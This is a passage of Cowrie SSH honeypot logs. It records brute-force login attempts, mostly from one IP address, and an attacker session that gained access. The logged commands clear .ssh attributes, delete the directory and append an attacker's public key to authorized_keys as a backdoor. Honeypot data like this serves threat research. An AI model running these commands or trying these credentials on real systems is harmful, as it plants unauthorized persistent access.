{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:50:37.394545Z","src_ip":"212.227.235.229","session":"ffed22705758"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51748,"dst_ip":"1.2.3.4","dst_port":22,"session":"42ba86922d83","protocol":"ssh","message":"New connection: 212.227.235.229:51748 (1.2.3.4:22) [session: 42ba86922d83]","sensor":"my-vps","timestamp":"2025-09-09T01:50:38.343421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:50:38.344712Z","src_ip":"212.227.235.229","session":"42ba86922d83"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:50:38.451594Z","src_ip":"212.227.235.229","session":"42ba86922d83"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:50:38.476314Z","src_ip":"212.227.235.229","session":"ffed22705758"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:50:38.738275Z","src_ip":"212.227.235.229","session":"44e977926382"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:50:38.739203Z","src_ip":"212.227.235.229","session":"ffed22705758"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123qweASD","message":"login attempt [admin/123qweASD] failed","sensor":"my-vps","timestamp":"2025-09-09T01:50:38.882941Z","src_ip":"212.227.235.229","session":"42ba86922d83"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:50:39.995699Z","src_ip":"212.227.235.229","session":"42ba86922d83"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:50:47.737291Z","src_ip":"212.227.235.229","session":"72687dba6d9c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:50:47.738153Z","src_ip":"212.227.235.229","session":"72687dba6d9c"}
{"eventid":"cowrie.session.closed","duration":"11.3","message":"Connection lost after 11.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:50:47.739954Z","src_ip":"212.227.235.229","session":"72687dba6d9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54750,"dst_ip":"1.2.3.4","dst_port":22,"session":"2de679890ae2","protocol":"ssh","message":"New connection: 212.227.235.229:54750 (1.2.3.4:22) [session: 2de679890ae2]","sensor":"my-vps","timestamp":"2025-09-09T01:50:52.332415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:50:52.334051Z","src_ip":"212.227.235.229","session":"2de679890ae2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:50:52.567110Z","src_ip":"212.227.235.229","session":"2de679890ae2"}
{"eventid":"cowrie.login.failed","username":"bob","password":"bob","message":"login attempt [bob/bob] failed","sensor":"my-vps","timestamp":"2025-09-09T01:50:53.503472Z","src_ip":"212.227.235.229","session":"2de679890ae2"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:50:54.741345Z","src_ip":"212.227.235.229","session":"2de679890ae2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46236,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f456a08a584","protocol":"ssh","message":"New connection: 212.227.235.229:46236 (1.2.3.4:22) [session: 7f456a08a584]","sensor":"my-vps","timestamp":"2025-09-09T01:51:00.850179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:51:00.850945Z","src_ip":"212.227.235.229","session":"7f456a08a584"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:51:01.106521Z","src_ip":"212.227.235.229","session":"7f456a08a584"}
{"eventid":"cowrie.login.success","username":"root","password":"fabregas","message":"login attempt [root/fabregas] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:51:02.168380Z","src_ip":"212.227.235.229","session":"7f456a08a584"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:51:02.752244Z","src_ip":"212.227.235.229","session":"7f456a08a584"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:51:02.752971Z","src_ip":"212.227.235.229","session":"7f456a08a584"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:51:02.753868Z","src_ip":"212.227.235.229","session":"7f456a08a584"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:51:02.931610Z","src_ip":"79.124.8.120","session":"c40afe44b4b6"}
{"eventid":"cowrie.session.closed","duration":180.06340312957764,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:51:02.935210Z","src_ip":"79.124.8.120","session":"c40afe44b4b6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:51:03.010731Z","src_ip":"212.227.235.229","session":"7f456a08a584"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:51:03.538646Z","src_ip":"212.227.235.229","session":"7f456a08a584"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:51:03.539451Z","src_ip":"212.227.235.229","session":"7f456a08a584"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:51:03.797568Z","src_ip":"212.227.235.229","session":"7f456a08a584"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:51:03.798626Z","src_ip":"212.227.235.229","session":"7f456a08a584"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43030,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3105d5d5796","protocol":"ssh","message":"New connection: 212.227.235.229:43030 (1.2.3.4:22) [session: b3105d5d5796]","sensor":"my-vps","timestamp":"2025-09-09T01:51:04.047156Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:51:04.048228Z","src_ip":"212.227.235.229","session":"b3105d5d5796"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:51:04.297036Z","src_ip":"212.227.235.229","session":"b3105d5d5796"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:51:05.334409Z","src_ip":"212.227.235.229","session":"b3105d5d5796"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:51:06.585931Z","src_ip":"212.227.235.229","session":"b3105d5d5796"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43032,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2d40bc3e0e5","protocol":"ssh","message":"New connection: 212.227.235.229:43032 (1.2.3.4:22) [session: d2d40bc3e0e5]","sensor":"my-vps","timestamp":"2025-09-09T01:51:06.836430Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:51:06.837241Z","src_ip":"212.227.235.229","session":"d2d40bc3e0e5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:51:07.092393Z","src_ip":"212.227.235.229","session":"d2d40bc3e0e5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:51:08.154177Z","src_ip":"212.227.235.229","session":"d2d40bc3e0e5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:51:08.410283Z","src_ip":"212.227.235.229","session":"d2d40bc3e0e5"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:51:08.412842Z","src_ip":"212.227.235.229","session":"7f456a08a584"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41790,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1c343f50b13","protocol":"ssh","message":"New connection: 212.227.235.229:41790 (1.2.3.4:22) [session: f1c343f50b13]","sensor":"my-vps","timestamp":"2025-09-09T01:51:13.875416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:51:13.876325Z","src_ip":"212.227.235.229","session":"f1c343f50b13"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:51:14.116141Z","src_ip":"212.227.235.229","session":"f1c343f50b13"}
{"eventid":"cowrie.login.failed","username":"tom","password":"1234567","message":"login attempt [tom/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T01:51:15.120272Z","src_ip":"212.227.235.229","session":"f1c343f50b13"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:51:16.362790Z","src_ip":"212.227.235.229","session":"f1c343f50b13"}
{"eventid":"cowrie.session.closed","duration":108.80398344993591,"message":"Connection lost after 108 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:51:18.547695Z","src_ip":"183.106.44.159","session":"f44fa118b074"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48564,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d7502528a2d","protocol":"ssh","message":"New connection: 212.227.125.160:48564 (1.2.3.4:22) [session: 8d7502528a2d]","sensor":"my-vps","timestamp":"2025-09-09T01:51:45.916714Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:51:45.919088Z","src_ip":"212.227.125.160","session":"8d7502528a2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50730,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf63063aecc4","protocol":"ssh","message":"New connection: 212.227.235.229:50730 (1.2.3.4:22) [session: cf63063aecc4]","sensor":"my-vps","timestamp":"2025-09-09T01:51:47.523714Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35364,"dst_ip":"1.2.3.4","dst_port":22,"session":"4768a0e817d2","protocol":"ssh","message":"New connection: 212.227.235.229:35364 (1.2.3.4:22) [session: 4768a0e817d2]","sensor":"my-vps","timestamp":"2025-09-09T01:51:48.060188Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:51:48.060924Z","src_ip":"212.227.235.229","session":"4768a0e817d2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["